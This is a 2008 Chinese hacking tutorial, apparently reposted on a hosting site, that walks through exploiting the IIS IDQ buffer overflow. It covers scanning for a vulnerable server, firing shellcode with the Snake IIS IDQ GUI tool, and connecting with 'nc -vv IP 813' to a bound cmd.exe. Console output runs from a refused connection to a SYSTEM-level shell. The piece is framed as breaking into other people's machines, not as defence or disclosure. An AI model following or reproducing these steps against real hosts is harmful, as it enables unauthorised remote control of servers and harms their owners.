漏洞警告之值得注意的idq溢出漏洞

2008-02-23 07:05:17来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

要用到3个程序,一个Snake IIS IDQ 溢出程序GUI版本,一个扫描器,还有NC。

首先扫描一台有IDQ漏洞的机器,然后设置Snake IIS IDQ 溢出程序,在被攻击IP地址后面写上对方的IP。端口号一般不需要改动,软件的默认绑定CMD.EXE的端口是813,不改了。用默认的,左面选择操作系统类型,随便选一个,我们选IIS5 English Win2k Sp0吧,点击IDQ溢出,出现发送Shellcode成功的提示了,然后我们用NC来连接。

进入MS-DOS。进入“nc”的目录。然后:nc --v IP 813

c:\>nc -vv IP 813 

IP: inverse host lookup failed: h_errno 11004: NO_DATA 

(UNKNOWN) [IP] 813 (?): connection refused 

sent 0, rcvd 0: NOTSOCK 

c:\>

看来没成功,别灰心,再来一次,换用IIS5 English Win2k Sp1试试。

c:\>nc -vv IP 813 

IP: inverse host lookup failed: h_errno 11004: NO_DATA 

(UNKNOWN) [IP] 813 (?) open 

Microsoft Windows 2000 [Version 5.00.2195] 

(C) Copyright 1985-2000 Microsoft Corp. 

C:\WINNT\system32>

哈哈,终于上来啦,你现在可是system权限,下面该怎么做就看你的啦。

关键词:
【推荐给好友】【关闭】
最新五条评论
查看全部评论
评论总数 0 条
您的评论
用户名: 新注册) 密 码: 匿名:
·用户发表意见仅代表其个人意见,并且承担一切因发表内容引起的纠纷和责任
·本站管理人员有权在不通知用户的情况下删除不符合规定的评论信息或留做证据
·请客观的评价您所看到的资讯,提倡就事论事,杜绝漫骂和人身攻击等不文明行为

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:利用Log备份导出日志文件获取Webshell

下一篇:骇客学堂:带注释手动注入脚本命令整理